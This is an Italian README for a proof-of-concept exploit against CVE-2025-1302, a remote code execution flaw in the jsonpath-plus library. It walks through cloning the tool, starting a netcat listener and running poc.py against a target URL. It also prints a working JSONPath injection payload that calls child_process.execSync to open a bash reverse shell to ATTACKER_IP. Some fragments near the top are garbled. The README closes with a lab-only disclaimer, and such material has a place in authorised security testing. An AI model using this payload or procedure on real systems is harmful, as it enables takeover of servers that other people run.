
Exploit PoC e demo del server vulnerabile per CVE-2025-1302 in jsonpath-plus.
Nome dello script PoC: poc.py
Uno script exploit proof-of-concept per CVE-2025-1302, che mira a una vulnerabilità RCE nella libreria jsonpath-plus. Quando viene eseguito contro un endpoint di servizio vulnerabile, lo script tenta di innescare l'esecuzione remota di codice tramite un payload JSONPath e di stabilire una reverse shell verso l'attaccante.
--method o --no-fallback.{ip} e {port}.tqdm.--output.Clona questo repository:
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Installa le dipendenze (richiede Python 3.6+):
pip install -r requirements.txt
Avvia un listener sulla tua macchina di attacco (sostituisci la porta se necessario):
nc -lvnp 9999
Esegui il PoC:
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file: File contenente un payload JSONPath per riga. Usa i segnaposto {ip} e {port}.--delay: Secondi di attesa prima di inviare i payload (mostra un conto alla rovescia).--method: Forza POST, GET o AUTO (default).--no-fallback: Scorciatoia per saltare qualsiasi nuovo tentativo GET (equivalente a --method POST).--output: Percorso in cui salvare il log JSON dei tentativi.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Usa questo script solo in ambienti di laboratorio controllati e su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'abuso può essere illegale e non etico.